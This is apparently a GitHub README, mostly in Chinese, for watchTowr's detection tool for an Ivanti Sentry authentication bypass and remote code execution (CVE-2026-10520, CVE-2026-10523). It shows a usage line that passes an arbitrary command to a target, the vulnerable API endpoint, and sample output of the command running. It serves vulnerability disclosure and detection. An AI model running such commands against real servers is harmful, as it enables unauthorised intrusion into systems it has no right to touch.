watchtowrlabs/watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523

# CVE-2026-10520 和 CVE-2026-10523 一个用于 Ivanti Sentry 身份验证绕过和远程代码执行检测的 Artifact 生成器。 有关技术细节，请参阅我们的[博客文章](https://labs.watchtowr.com/)。 # 实际检测 ``` $ python3 watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523.py --url https://127.0.0.1 --cmd "uname -a" __ ___ ___________ __ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________ \ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \ \ / / __ \| | \ \___| Y | |( <_> \ / | | \/ \/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__| \/ \/ \/ watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523.py (*) Ivanti Sentry Authentication Bypass and Remote Code Execution Detection Artifact Generator Tool - Sonny , watchTowr (sonny@watchTowr.com) CVEs: [CVE-2026-10520, CVE-2026-10523] ============================================================ Target: https://127.0.0.1 Command: uname -a [+] Sending command execution check to: https://127.0.0.1/mics/api/v2/sentry/mics-config/handleMessage [+] Target appears to be vulnerable. Command output: Linux 127.0.0.1 4.18.0-553.84.1.el8_10.x86_64 #1 SMP Mon Nov 17 12:53:24 PST 2025 x86_64 x86_64 x86_64 GNU/Linux ``` # 用法 ``` python3 watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523.py --url https://127.0.0.1 --cmd "uname -a" ``` # 描述 此 watchTowr 检测 Artifact 生成器用于检测 Ivanti Sentry 身份验证绕过和远程代码执行漏洞 CVE-2026-10520 和 CVE-2026-10523。 修复方案和更多详情可在 Ivanti 的安全公告中找到：https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2026-10520-CVE-2026-10523 # 关注 [watchTowr](https://watchTowr.com) Labs 获取最新的安全研究，请关注 [watchTowr](https://watchTowr.com) Labs 团队。 - https://labs.watchtowr.com/ - https://x.com/watchtowrcyber

标签：CISA项目, Ivanti, Python, 无后门, 编程工具, 身份验证绕过, 远程代码执行, 逆向工具